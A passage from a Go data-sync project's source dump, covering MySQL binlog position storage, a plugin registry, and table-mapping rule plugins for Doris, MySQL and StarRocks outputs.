position: %v", pos.resumeTokenTimestamp()) 131 | return 132 | } 133 | } 134 | }() 135 | } 136 | 137 | func (pos *MongoPosition) Close() { 138 | pos.cancel() 139 | pos.wg.Wait() 140 | log.Infof("close mongo save position ticker goroutine.") 141 | } 142 | 143 | func (pos *MongoPosition) resumeTokenTimestamp() uint64 { 144 | i, err := strconv.ParseUint(pos.ResumeTokens.Data[2:18], 16, 64) 145 | if err != nil { 146 | log.Errorf("resumeToken parsing timestamp err %v", err) 147 | } 148 | return i >> 32 149 | 150 | } 151 | -------------------------------------------------------------------------------- /pkg/position/pos_mysql.go: -------------------------------------------------------------------------------- 1 | package position 2 | 3 | import ( 4 | "context" 5 | "encoding/json" 6 | "fmt" 7 | "github.com/BurntSushi/toml" 8 | "github.com/go-mysql-org/go-mysql/client" 9 | "github.com/go-mysql-org/go-mysql/mysql" 10 | "github.com/juju/errors" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 13 | "github.com/mitchellh/mapstructure" 14 | "github.com/siddontang/go-log/log" 15 | "sync" 16 | "time" 17 | ) 18 | 19 | type MysqlBasePosition struct { 20 | BinlogName string `toml:"binlog-name" json:"binlog-name"` 21 | BinlogPos uint32 `toml:"binlog-pos" json:"binlog-pos"` 22 | BinlogGTID string `toml:"binlog-gtid" json:"binlog-gtid"` 23 | } 24 | type MysqlPosition struct { 25 | sync.RWMutex 26 | *MysqlBasePosition 27 | FilePath string 28 | Name string 29 | lastSaveTime time.Time 30 | connLock sync.Mutex 31 | conn *client.Conn 32 | wg sync.WaitGroup 33 | ctx context.Context 34 | cancel context.CancelFunc 35 | } 36 | 37 | const MysqlPosName = "mysql" 38 | 39 | func init() { 40 | registry.RegisterPlugin(registry.InputPositionPlugin, MysqlPosName, &MysqlPosition{}) 41 | } 42 | 43 | func (pos *MysqlPosition) Configure(pipelineName string, configInput map[string]interface{}) error { 44 | return nil 45 | } 46 | 47 | 
func (pos *MysqlPosition) LoadPosition(conf *config.BaseConfig) string { 48 | var err error 49 | pos.ctx, pos.cancel = context.WithCancel(context.Background()) 50 | // load pos info from db 51 | // init db 52 | 53 | meta, ok := conf.InputConfig.Config["meta"] 54 | mc := &config.MysqlConfig{} 55 | if ok { 56 | if err = mapstructure.Decode(meta, mc); err != nil { 57 | log.Fatal("input config parsing failed. err: ", err.Error()) 58 | } 59 | } else { 60 | meta = &config.MysqlConfig{} 61 | if err = mapstructure.Decode(conf.InputConfig.Config["source"], mc); err != nil { 62 | log.Fatal("input config parsing failed. err: ", err.Error()) 63 | } 64 | // if meta is nil, init meta = source 65 | conf.InputConfig.Config["meta"] = conf.InputConfig.Config["source"] 66 | } 67 | 68 | pos.Name = conf.Name 69 | 70 | // init conn 71 | pos.conn, err = client.Connect( 72 | fmt.Sprintf("%s:%d", mc.Host, mc.Port), 73 | mc.UserName, mc.Password, "", 74 | func(c *client.Conn) { _ = c.SetCharset("utf8") }) 75 | if err != nil { 76 | log.Fatal("input config conn failed. err: ", err.Error()) 77 | } 78 | 79 | // init database 80 | pos.initDb() 81 | 82 | basePos := &MysqlBasePosition{} 83 | queryPosSql := fmt.Sprintf("select `position` from `%s`.`positions` where `name` = '%s'", DbName, conf.Name) 84 | r, err := pos.executeSQL(queryPosSql) 85 | if err != nil { 86 | log.Fatal("query `position` table failed. err: ", err.Error()) 87 | } 88 | position, err := r.GetString(0, 0) 89 | if err != nil { 90 | log.Fatalf("`position` data get failed. err: %v", err.Error()) 91 | } 92 | err = json.Unmarshal([]byte(position), basePos) 93 | if err != nil { 94 | log.Fatalf("`position` data parsing failed. 
err: %v", err.Error()) 95 | } 96 | 97 | pos.MysqlBasePosition = basePos 98 | 99 | if pos.BinlogGTID != "" { 100 | return pos.BinlogGTID 101 | } 102 | 103 | // from local pos.info load 104 | positionFilePath := GetPositionFilePath(conf) 105 | initFilePositionData := "binlog-name = \"\"\nbinlog-pos = 0\nbinlog-gtid = \"\"" 106 | FindPositionFileNotCreate(positionFilePath, initFilePositionData) 107 | if _, err = toml.DecodeFile(positionFilePath, basePos); err != nil { 108 | log.Fatal(err) 109 | } 110 | if basePos.BinlogGTID != "" { 111 | // update db position from local pos.info 112 | marshal, err := json.Marshal(basePos) 113 | if err != nil { 114 | log.Fatal("init position data failed. err: ", err.Error()) 115 | } 116 | updPosSql := fmt.Sprintf("update `%s`.`positions` "+ 117 | "set `position` = '%s' where `name` = '%s'", DbName, string(marshal), conf.Name) 118 | _, err = pos.executeSQL(updPosSql) 119 | if err != nil { 120 | log.Fatal("update `position` table failed. err: ", err.Error()) 121 | } 122 | pos.MysqlBasePosition = basePos 123 | pos.FilePath = positionFilePath 124 | return pos.BinlogGTID 125 | } 126 | 127 | // if binlogGTID is "", load config start-position 128 | if conf.InputConfig.StartPosition != "" { 129 | pos.BinlogGTID = conf.InputConfig.StartPosition 130 | } 131 | return pos.BinlogGTID 132 | } 133 | 134 | func (pos *MysqlPosition) initDb() { 135 | r, err := pos.executeSQL("select"+ 136 | " 1 from information_schema.SCHEMATA where SCHEMA_NAME = ?", DbName) 137 | if err != nil { 138 | log.Fatalf("init position db `_go_mysql_sr` failed. err: %v", err.Error()) 139 | } 140 | 141 | if r.RowNumber() == 0 { 142 | createSql := fmt.Sprintf( 143 | "CREATE "+ 144 | "DATABASE IF NOT EXISTS `%s` DEFAULT CHARACTER SET utf8mb4", DbName) 145 | _, err = pos.executeSQL(createSql) 146 | if err != nil { 147 | log.Fatalf("init position db `_go_mysql_sr` failed. 
err: %v", err.Error()) 148 | } 149 | } 150 | 151 | r, err = pos.executeSQL("select 1 from "+ 152 | "information_schema.tables where table_schema = ? and table_name = ?", DbName, "positions") 153 | if err != nil { 154 | log.Fatalf("query table failed. err: %v", err.Error()) 155 | } 156 | 157 | if r.RowNumber() == 0 { 158 | posTaSql := fmt.Sprintf( 159 | "CREATE TABLE IF NOT EXISTS "+ 160 | "`%s`.`positions` ("+ 161 | "`id` int(11) NOT NULL AUTO_INCREMENT,"+ 162 | "`name` varchar(255) NOT NULL,"+ 163 | "`position` text,"+ 164 | "`created_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,"+ 165 | "`updated_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,"+ 166 | "PRIMARY KEY (`id`),"+ 167 | "UNIQUE KEY `name` (`name`)"+ 168 | ")", DbName) 169 | _, err = pos.executeSQL(posTaSql) 170 | if err != nil { 171 | log.Fatalf("query table failed. err: %v", err.Error()) 172 | } 173 | } 174 | 175 | // init table table_checkpoints table_increment_ddl 176 | r, err = pos.executeSQL("select 1 from "+ 177 | "information_schema.tables where table_schema = ? and table_name = ?", DbName, "table_checkpoints") 178 | if err != nil { 179 | log.Fatalf("query table failed. err: %v", err.Error()) 180 | } 181 | 182 | if r.RowNumber() == 0 { 183 | tcTaSql := fmt.Sprintf("CREATE TABLE IF NOT EXISTS "+ 184 | "`%s`.`table_checkpoints` ("+ 185 | "`id` int(11) NOT NULL AUTO_INCREMENT,"+ 186 | "`pos_id` int(11) NOT NULL,"+ 187 | "`tables_meta` mediumtext,"+ 188 | "`created_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,"+ 189 | "`updated_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,"+ 190 | "PRIMARY KEY (`id`))", DbName) 191 | _, err = pos.executeSQL(tcTaSql) 192 | if err != nil { 193 | log.Fatal("init `table_checkpoints` table failed. err: ", err.Error()) 194 | } 195 | } 196 | 197 | r, err = pos.executeSQL("select 1 from "+ 198 | "information_schema.tables where table_schema = ? 
and table_name = ?", DbName, "table_increment_ddl") 199 | if err != nil { 200 | log.Fatalf("init position db `_go_mysql_sr` failed. err: %v", err.Error()) 201 | } 202 | 203 | if r.RowNumber() == 0 { 204 | tidTaSql := fmt.Sprintf("CREATE TABLE IF NOT EXISTS "+ 205 | "`%s`.`table_increment_ddl` ("+ 206 | "`id` int(11) NOT NULL AUTO_INCREMENT,"+ 207 | "`pos_id` int(11) NOT NULL,"+ 208 | "`db` varchar(50) NOT NULL,"+ 209 | "`table_name` varchar(255) DEFAULT NULL COMMENT '',"+ 210 | "`table_ddl` text,"+ 211 | "`ddl_pos` varchar(500),"+ 212 | "`serial_number` int UNSIGNED not null DEFAULT '0' comment '',"+ 213 | "`created_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,"+ 214 | "`updated_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,"+ 215 | "PRIMARY KEY (`id`),"+ 216 | "UNIQUE KEY `uk_posid_ddlpos_serialnumber` (`pos_id`,`ddl_pos`,`serial_number`))", DbName) 217 | _, err = pos.executeSQL(tidTaSql) 218 | if err != nil { 219 | log.Fatal("init `table_increment_ddl` table failed. err: ", err.Error()) 220 | } 221 | } 222 | 223 | initPositionData := MysqlBasePosition{BinlogName: "", BinlogPos: 0, BinlogGTID: ""} 224 | marshal, err := json.Marshal(initPositionData) 225 | if err != nil { 226 | log.Fatal("init position data failed. err: ", err.Error()) 227 | } 228 | posDataSql := fmt.Sprintf( 229 | "insert "+ 230 | "ignore into `%s`.`positions`"+ 231 | "(name, position)values('%s', '%v')", DbName, pos.Name, string(marshal)) 232 | _, err = pos.executeSQL(posDataSql) 233 | if err != nil { 234 | log.Fatal("init `position` table failed. 
err: ", err.Error()) 235 | } 236 | } 237 | 238 | func (pos *MysqlPosition) SavePosition() error { 239 | pos.Lock() 240 | defer pos.Unlock() 241 | 242 | n := time.Now() 243 | if n.Sub(pos.lastSaveTime) < time.Second { 244 | return nil 245 | } 246 | pos.lastSaveTime = n 247 | 248 | // save pos to db 249 | marshal, err := json.Marshal(pos.MysqlBasePosition) 250 | if err != nil { 251 | log.Fatalf("`position` data parsing failed. err: %v", err.Error()) 252 | } 253 | saveSql := fmt.Sprintf("update `%s`.`positions` "+ 254 | "set `position` = '%s' where `name` = '%s'", DbName, string(marshal), pos.Name) 255 | _, err = pos.executeSQL(saveSql) 256 | if err != nil { 257 | log.Errorf("canal save position to db %s.%s err %v", DbName, pos.Name, err) 258 | } 259 | log.Debugf("save canal sync position gtid: %s", pos.BinlogGTID) 260 | 261 | return errors.Trace(err) 262 | } 263 | 264 | func (pos *MysqlPosition) ModifyPosition(v string) error { 265 | pos.Lock() 266 | defer pos.Unlock() 267 | if v == "" { 268 | return errors.Errorf("empty value") 269 | } 270 | pos.BinlogGTID = v 271 | return nil 272 | } 273 | 274 | func (pos *MysqlPosition) StartPosition() { 275 | if pos.BinlogGTID == "" { 276 | log.Fatal("start position failed: empty value binlog gtid value") 277 | } 278 | 279 | pos.wg.Add(1) 280 | go func() { 281 | defer pos.wg.Done() 282 | ticker := time.NewTicker(time.Second * 3) 283 | defer ticker.Stop() 284 | 285 | for { 286 | select { 287 | case <-ticker.C: 288 | if err := pos.SavePosition(); err != nil { 289 | log.Fatalf("position save failed: %v", errors.ErrorStack(err)) 290 | } 291 | case <-pos.ctx.Done(): 292 | if err := pos.SavePosition(); err != nil { 293 | log.Fatalf("last position save failed: %v", errors.ErrorStack(err)) 294 | } 295 | log.Infof("last position save successfully. 
position: %v", pos.BinlogGTID) 296 | return 297 | } 298 | } 299 | }() 300 | } 301 | 302 | func (pos *MysqlPosition) Close() { 303 | pos.cancel() 304 | pos.wg.Wait() 305 | if pos.conn != nil { 306 | err := pos.conn.Close() 307 | if err != nil { 308 | log.Warnf("close mysql save position conn failed. err: %v", err.Error()) 309 | } 310 | } 311 | log.Infof("close mysql save position ticker goroutine.") 312 | } 313 | 314 | func (pos *MysqlPosition) executeSQL(cmd string, args ...interface{}) (rr *mysql.Result, err error) { 315 | pos.connLock.Lock() 316 | defer pos.connLock.Unlock() 317 | rr, err = pos.conn.Execute(cmd, args...) 318 | if err != nil && !mysql.ErrorEqual(err, mysql.ErrBadConn) { 319 | return 320 | } else if mysql.ErrorEqual(err, mysql.ErrBadConn) { 321 | err = pos.conn.Close() 322 | if err != nil { 323 | return nil, err 324 | } 325 | pos.conn = nil 326 | } else { 327 | return 328 | } 329 | return 330 | } 331 | -------------------------------------------------------------------------------- /pkg/position/utils.go: -------------------------------------------------------------------------------- 1 | package position 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 5 | "github.com/siddontang/go-log/log" 6 | "os" 7 | "strings" 8 | ) 9 | 10 | var DbName = "_go_mysql_sr" 11 | 12 | func GetPositionFilePath(conf *config.BaseConfig) string { 13 | splits := strings.SplitAfter(*conf.FileName, "/") 14 | lastIndex := len(splits) - 1 15 | splits[lastIndex] = "_" + conf.Name + "-pos.info" 16 | positionFileName := strings.Join(splits, "") 17 | return positionFileName 18 | } 19 | 20 | func FindPositionFileNotCreate(filePath string, initPositionData string) { 21 | if _, err := os.Stat(filePath); err == nil { 22 | return 23 | } 24 | f, err := os.OpenFile(filePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0600) 25 | defer func(f *os.File) { 26 | if f == nil { 27 | return 28 | } 29 | if err := f.Close(); err != nil { 30 | log.Fatalf("file close failed. 
err: ", err.Error()) 31 | } 32 | }(f) 33 | if err != nil { 34 | log.Fatal(err) 35 | } else { 36 | _, err = f.Write([]byte(initPositionData)) 37 | if err != nil { 38 | log.Fatal(err) 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /pkg/registry/registry.go: -------------------------------------------------------------------------------- 1 | package registry 2 | 3 | import ( 4 | "fmt" 5 | "github.com/juju/errors" 6 | "github.com/siddontang/go-log/log" 7 | "sync" 8 | ) 9 | 10 | type PluginType string 11 | 12 | const ( 13 | InputPlugin PluginType = "input" 14 | InputPositionPlugin PluginType = "inputPosition" 15 | InputSchemaPlugin PluginType = "inputSchema" 16 | OutputPlugin PluginType = "output" 17 | OutputRulePlugin PluginType = "outputRule" 18 | ) 19 | 20 | type Plugin interface { 21 | Configure(pipelineName string, data map[string]interface{}) error 22 | } 23 | 24 | var registry map[PluginType]map[string]Plugin 25 | var mutex sync.Mutex 26 | 27 | func init() { 28 | registry = make(map[PluginType]map[string]Plugin) 29 | } 30 | 31 | func RegisterPlugin(pluginType PluginType, name string, v Plugin) { 32 | mutex.Lock() 33 | defer mutex.Unlock() 34 | 35 | log.Debugf("[RegisterPlugin] type: %v, name: %v", pluginType, name) 36 | 37 | _, ok := registry[pluginType] 38 | if !ok { 39 | registry[pluginType] = make(map[string]Plugin) 40 | } 41 | 42 | _, ok = registry[pluginType][name] 43 | if ok { 44 | panic(fmt.Sprintf("plugin already exists, type: %v, name: %v", pluginType, name)) 45 | } 46 | registry[pluginType][name] = v 47 | } 48 | 49 | func GetPlugin(pluginType PluginType, name string) (Plugin, error) { 50 | mutex.Lock() 51 | defer mutex.Unlock() 52 | 53 | if registry == nil { 54 | return nil, errors.Errorf("empty registry") 55 | } 56 | 57 | plugins, ok := registry[pluginType] 58 | if !ok { 59 | return nil, errors.Errorf("empty plugin type: %v, name: %v", pluginType, name) 60 | } 61 | p, ok := plugins[name] 62 | 
if !ok { 63 | return nil, errors.Errorf("empty plugin, type: %v, name: %v", pluginType, name) 64 | } 65 | return p, nil 66 | } 67 | -------------------------------------------------------------------------------- /pkg/rule/rule_doris.go: -------------------------------------------------------------------------------- 1 | package rule 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 5 | "github.com/mitchellh/mapstructure" 6 | "github.com/siddontang/go-log/log" 7 | ) 8 | 9 | type DorisRules struct { 10 | Rules []*DorisRule 11 | RulesRegex []string 12 | RulesMap map[string]interface{} 13 | } 14 | 15 | type DorisRule struct { 16 | SourceSchema string `toml:"source-schema" json:"source-schema" mapstructure:"source-schema"` 17 | SourceTable string `toml:"source-table" json:"source-table" mapstructure:"source-table"` 18 | TargetSchema string `toml:"target-schema" json:"target-schema" mapstructure:"target-schema"` 19 | TargetTable string `toml:"target-table" json:"target-table" mapstructure:"target-table"` 20 | RuleType RuleType `default:"init" json:"rule-type"` // default: init, init、dynamic add 21 | // for api delete rule, only logical deleted, fix output get ruleMap failed problem. when add the same rule physical deleted 22 | Deleted bool `default:"false" json:"deleted"` 23 | } 24 | 25 | const DorisRuleName = "doris" 26 | 27 | func init() { 28 | registry.RegisterPlugin(registry.OutputRulePlugin, DorisRuleName, &DorisRules{}) 29 | } 30 | 31 | func (drs *DorisRules) Configure(pipelineName string, configOutput map[string]interface{}) error { 32 | configRules := configOutput["rule"] 33 | err := mapstructure.Decode(configRules, &drs.Rules) 34 | if err != nil { 35 | log.Fatal("output.config.rule config parsing failed. 
err: ", err.Error()) 36 | } 37 | // init 38 | for i := range drs.Rules { 39 | drs.Rules[i].RuleType = TypeInit 40 | drs.Rules[i].Deleted = false 41 | } 42 | drs.RuleToRegex() 43 | drs.RuleToMap() 44 | return nil 45 | } 46 | 47 | func (drs *DorisRules) NewRule(config map[string]interface{}) { 48 | configRules := config["rule"] 49 | err := mapstructure.Decode(configRules, &drs.Rules) 50 | if err != nil { 51 | log.Fatal("output.config.rule config parsing failed. err: ", err.Error()) 52 | } 53 | // init 54 | for i := range drs.Rules { 55 | drs.Rules[i].RuleType = TypeInit 56 | drs.Rules[i].Deleted = false 57 | } 58 | drs.RuleToRegex() 59 | drs.RuleToMap() 60 | } 61 | 62 | func (drs *DorisRules) RuleToRegex() { 63 | if len(drs.Rules) == 0 { 64 | log.Fatal("rule config cannot be empty") 65 | } 66 | for _, r := range drs.Rules { 67 | // cfg.IncludeTableRegex[0] = "test\\..*" 68 | drs.RulesRegex = append(drs.RulesRegex, SchemaTableToStrRegex(r.SourceSchema, r.SourceTable)) 69 | } 70 | } 71 | 72 | func (drs *DorisRules) RuleToMap() { 73 | if len(drs.Rules) == 0 { 74 | log.Fatal("rule config cannot be empty") 75 | } 76 | drs.RulesMap = make(map[string]interface{}) 77 | for _, r := range drs.Rules { 78 | drs.RulesMap[RuleKeyFormat(r.SourceSchema, r.SourceTable)] = r 79 | } 80 | } 81 | 82 | func (drs *DorisRules) GetRuleToRegex() []string { 83 | return drs.RulesRegex 84 | } 85 | 86 | func (drs *DorisRules) GetRuleToMap() map[string]interface{} { 87 | return drs.RulesMap 88 | } 89 | 90 | func (drs *DorisRules) GetRule(schemaTable string) interface{} { 91 | v, ok := drs.RulesMap[schemaTable] 92 | if ok { 93 | return v 94 | } 95 | log.Fatalf("get rule failed. 
target rule for %v not find.", schemaTable) 96 | return nil 97 | } 98 | 99 | func (drs *DorisRules) TargetString() string { 100 | return "" 101 | } 102 | -------------------------------------------------------------------------------- /pkg/rule/rule_mysql.go: -------------------------------------------------------------------------------- 1 | package rule 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 5 | "github.com/mitchellh/mapstructure" 6 | "github.com/siddontang/go-log/log" 7 | ) 8 | 9 | type MysqlRules struct { 10 | Rules []*MysqlRule 11 | RulesRegex []string 12 | RulesMap map[string]interface{} 13 | } 14 | 15 | type MysqlRule struct { 16 | SourceSchema string `toml:"source-schema" json:"source-schema" mapstructure:"source-schema"` 17 | SourceTable string `toml:"source-table" json:"source-table" mapstructure:"source-table"` 18 | TargetSchema string `toml:"target-schema" json:"target-schema" mapstructure:"target-schema"` 19 | TargetTable string `toml:"target-table" json:"target-table" mapstructure:"target-table"` 20 | PrimaryKeys []string `toml:"primary-keys" json:"primary-keys" mapstructure:"primary-keys"` 21 | SourceColumns []string `toml:"source-columns" json:"source-columns" mapstructure:"source-columns"` 22 | TargetColumns []string `toml:"target-columns" json:"target-columns" mapstructure:"target-columns"` 23 | RuleType RuleType `default:"init" json:"rule-type"` // default: init, init、dynamic add 24 | // for api delete rule, only logical deleted, fix output get ruleMap failed problem. 
when add the same rule physical deleted
	Deleted bool `default:"false" json:"deleted"`
}

const MysqlRuleName = "mysql"

func init() {
	registry.RegisterPlugin(registry.OutputRulePlugin, MysqlRuleName, &MysqlRules{})
}

// Configure decodes output.config.rule into Rules and rebuilds the derived
// regex/map lookups. A parse failure aborts the process.
func (mrs *MysqlRules) Configure(pipelineName string, configOutput map[string]interface{}) error {
	configRules := configOutput["rule"]
	err := mapstructure.Decode(configRules, &mrs.Rules)
	if err != nil {
		log.Fatal("output.config.rule config parsing failed. err: ", err.Error())
	}
	// init: every decoded rule starts as an "init" (config-file) rule.
	for i := range mrs.Rules {
		mrs.Rules[i].RuleType = TypeInit
		mrs.Rules[i].Deleted = false
	}
	mrs.RuleToRegex()
	mrs.RuleToMap()
	return nil
}

// NewRule re-decodes the rule list from config (dynamic-add API path) and
// rebuilds the derived lookups. A parse failure aborts the process.
func (mrs *MysqlRules) NewRule(config map[string]interface{}) {
	configRules := config["rule"]
	err := mapstructure.Decode(configRules, &mrs.Rules)
	if err != nil {
		log.Fatal("output.config.rule config parsing failed. err: ", err.Error())
	}
	// init
	for i := range mrs.Rules {
		mrs.Rules[i].RuleType = TypeInit
		mrs.Rules[i].Deleted = false
	}
	mrs.RuleToRegex()
	mrs.RuleToMap()
}

// RuleToRegex rebuilds RulesRegex from Rules.
// BUGFIX: build a fresh slice instead of appending to the old one — appending
// made RulesRegex accumulate duplicate entries every time Configure/NewRule
// ran again (RuleToMap already rebuilds its map from scratch).
func (mrs *MysqlRules) RuleToRegex() {
	if len(mrs.Rules) == 0 {
		log.Fatal("rule config cannot be empty")
	}
	regexes := make([]string, 0, len(mrs.Rules))
	for _, r := range mrs.Rules {
		// cfg.IncludeTableRegex[0] = "test\\..*"
		regexes = append(regexes, SchemaTableToStrRegex(r.SourceSchema, r.SourceTable))
	}
	mrs.RulesRegex = regexes
}

// RuleToMap rebuilds the "schema:table" -> rule lookup map from Rules.
func (mrs *MysqlRules) RuleToMap() {
	if len(mrs.Rules) == 0 {
		log.Fatal("rule config cannot be empty")
	}
	mrs.RulesMap = make(map[string]interface{})
	for _, r := range mrs.Rules {
		mrs.RulesMap[RuleKeyFormat(r.SourceSchema, r.SourceTable)] = r
	}
}

func (mrs *MysqlRules) GetRuleToRegex() []string {
	return mrs.RulesRegex
}

func (mrs *MysqlRules) GetRuleToMap() map[string]interface{} {
	return mrs.RulesMap
}

// GetRule returns the rule registered for "schema:table"; a missing rule is
// fatal because the caller cannot route the event anywhere.
func (mrs *MysqlRules) GetRule(schemaTable string) interface{} {
	v, ok := mrs.RulesMap[schemaTable]
	if ok {
		return v
	}
	log.Fatalf("get rule failed. 
target rule for %v not find.", schemaTable) 99 | return nil 100 | } 101 | 102 | func (mrs *MysqlRules) TargetString() string { 103 | return "" 104 | } 105 | -------------------------------------------------------------------------------- /pkg/rule/rule_starrocks.go: -------------------------------------------------------------------------------- 1 | package rule 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 5 | "github.com/mitchellh/mapstructure" 6 | "github.com/siddontang/go-log/log" 7 | ) 8 | 9 | type StarrocksRules struct { 10 | Rules []*StarrocksRule 11 | RulesRegex []string 12 | RulesMap map[string]interface{} 13 | } 14 | 15 | type StarrocksRule struct { 16 | SourceSchema string `toml:"source-schema" json:"source-schema" mapstructure:"source-schema"` 17 | SourceTable string `toml:"source-table" json:"source-table" mapstructure:"source-table"` 18 | TargetSchema string `toml:"target-schema" json:"target-schema" mapstructure:"target-schema"` 19 | TargetTable string `toml:"target-table" json:"target-table" mapstructure:"target-table"` 20 | RuleType RuleType `default:"init" json:"rule-type"` // init、dynamic add 21 | // for api delete rule, only logical deleted, fix output get ruleMap failed problem. when add the same rule physical deleted 22 | Deleted bool `default:"false" json:"deleted"` 23 | } 24 | 25 | const StarrocksRuleName = "starrocks" 26 | 27 | func init() { 28 | registry.RegisterPlugin(registry.OutputRulePlugin, StarrocksRuleName, &StarrocksRules{}) 29 | } 30 | 31 | func (srs *StarrocksRules) Configure(pipelineName string, configOutput map[string]interface{}) error { 32 | configRules := configOutput["rule"] 33 | err := mapstructure.Decode(configRules, &srs.Rules) 34 | if err != nil { 35 | log.Fatal("output.config.rule config parsing failed. 
err: ", err.Error()) 36 | } 37 | // init 38 | for i := range srs.Rules { 39 | srs.Rules[i].RuleType = TypeInit 40 | srs.Rules[i].Deleted = false 41 | } 42 | srs.RuleToRegex() 43 | srs.RuleToMap() 44 | return nil 45 | } 46 | 47 | func (srs *StarrocksRules) NewRule(config map[string]interface{}) { 48 | configRules := config["rule"] 49 | err := mapstructure.Decode(configRules, &srs.Rules) 50 | if err != nil { 51 | log.Fatal("output.config.rule config parsing failed. err: ", err.Error()) 52 | } 53 | // init 54 | for i := range srs.Rules { 55 | srs.Rules[i].RuleType = TypeInit 56 | srs.Rules[i].Deleted = false 57 | } 58 | srs.RuleToRegex() 59 | srs.RuleToMap() 60 | } 61 | 62 | func (srs *StarrocksRules) RuleToRegex() { 63 | if len(srs.Rules) == 0 { 64 | log.Fatal("rule config cannot be empty") 65 | } 66 | for _, r := range srs.Rules { 67 | srs.RulesRegex = append(srs.RulesRegex, SchemaTableToStrRegex(r.SourceSchema, r.SourceTable)) 68 | } 69 | } 70 | 71 | func (srs *StarrocksRules) RuleToMap() { 72 | if len(srs.Rules) == 0 { 73 | log.Fatal("rule config cannot be empty") 74 | } 75 | srs.RulesMap = make(map[string]interface{}) 76 | for _, r := range srs.Rules { 77 | srs.RulesMap[RuleKeyFormat(r.SourceSchema, r.SourceTable)] = r 78 | } 79 | } 80 | 81 | func (srs *StarrocksRules) GetRuleToRegex() []string { 82 | return srs.RulesRegex 83 | } 84 | 85 | func (srs *StarrocksRules) GetRuleToMap() map[string]interface{} { 86 | return srs.RulesMap 87 | } 88 | 89 | func (srs *StarrocksRules) GetRule(schemaTable string) interface{} { 90 | v, ok := srs.RulesMap[schemaTable] 91 | if ok { 92 | return v 93 | } 94 | log.Fatalf("get rule failed. 
target rule for %v not find.", schemaTable) 95 | return nil 96 | } 97 | 98 | func (srs *StarrocksRules) TargetString() string { 99 | return "" 100 | } 101 | -------------------------------------------------------------------------------- /pkg/rule/utils.go: -------------------------------------------------------------------------------- 1 | package rule 2 | 3 | import ( 4 | "errors" 5 | "fmt" 6 | "github.com/siddontang/go-log/log" 7 | "strings" 8 | ) 9 | 10 | type RuleType string 11 | 12 | const ( 13 | TypeInit RuleType = "init" 14 | TypeDynamicAdd RuleType = "dynamic add" 15 | ) 16 | 17 | func SchemaTableToStrRegex(schema string, table string) string { 18 | if schema == "" || table == "" { 19 | log.Fatal("rule cannot be empty") 20 | } 21 | // cfg.IncludeTableRegex[0] = "test\\..*" 22 | return "^" + schema + "\\." + table + "$" 23 | } 24 | 25 | func StrRegexToSchemaTable(regex string) (string, string) { 26 | if regex == "" { 27 | log.Fatal("regex cannot be empty") 28 | } 29 | tmpRegex := strings.ReplaceAll(regex, "^", "") 30 | tmpRegex = strings.ReplaceAll(tmpRegex, "$", "") 31 | tmpRegex = strings.ReplaceAll(tmpRegex, "\\", "") 32 | if strings.Index(tmpRegex, ".") == -1 { 33 | log.Fatalf("regex: %s delimiter '.' 
cannot be found.", regex) 34 | } 35 | splitRegex := strings.Split(tmpRegex, ".") 36 | return splitRegex[0], splitRegex[1] 37 | } 38 | 39 | func RuleKeyFormat(schema string, table string) string { 40 | return schema + ":" + table 41 | } 42 | 43 | func GetRuleKeySchemaTable(ruleKey string) (string, string, error) { 44 | if ruleKey == "" || !strings.Contains(ruleKey, ":") { 45 | return "", "", errors.New(fmt.Sprintf("rulekey:%s is invalid", ruleKey)) 46 | } 47 | schemaTable := strings.Split(ruleKey, ":") 48 | return schemaTable[0], schemaTable[1], nil 49 | } 50 | -------------------------------------------------------------------------------- /pkg/schema/sch_mongo.go: -------------------------------------------------------------------------------- 1 | package schema 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/juju/errors" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 9 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 10 | "github.com/mitchellh/mapstructure" 11 | "github.com/siddontang/go-log/log" 12 | "go.mongodb.org/mongo-driver/mongo" 13 | "go.mongodb.org/mongo-driver/mongo/options" 14 | "reflect" 15 | "sync" 16 | "time" 17 | ) 18 | 19 | type MongoTables struct { 20 | *config.MongoConfig 21 | tablesLock sync.RWMutex 22 | tables map[string]*Table 23 | connLock sync.Mutex 24 | conn *mongo.Client 25 | ctx context.Context 26 | cancel context.CancelFunc 27 | } 28 | 29 | const MongoName = "mongo" 30 | 31 | func init() { 32 | registry.RegisterPlugin(registry.InputSchemaPlugin, MongoName, &MongoTables{}) 33 | } 34 | 35 | func (mts *MongoTables) Configure(pipelineName string, configInput map[string]interface{}) error { 36 | return nil 37 | } 38 | 39 | func (mts *MongoTables) NewSchemaTables(conf *config.BaseConfig, pluginConfig map[string]interface{}, startPos string, rulesMap map[string]interface{}) { 40 | mts.tables = make(map[string]*Table) 41 | mts.MongoConfig = 
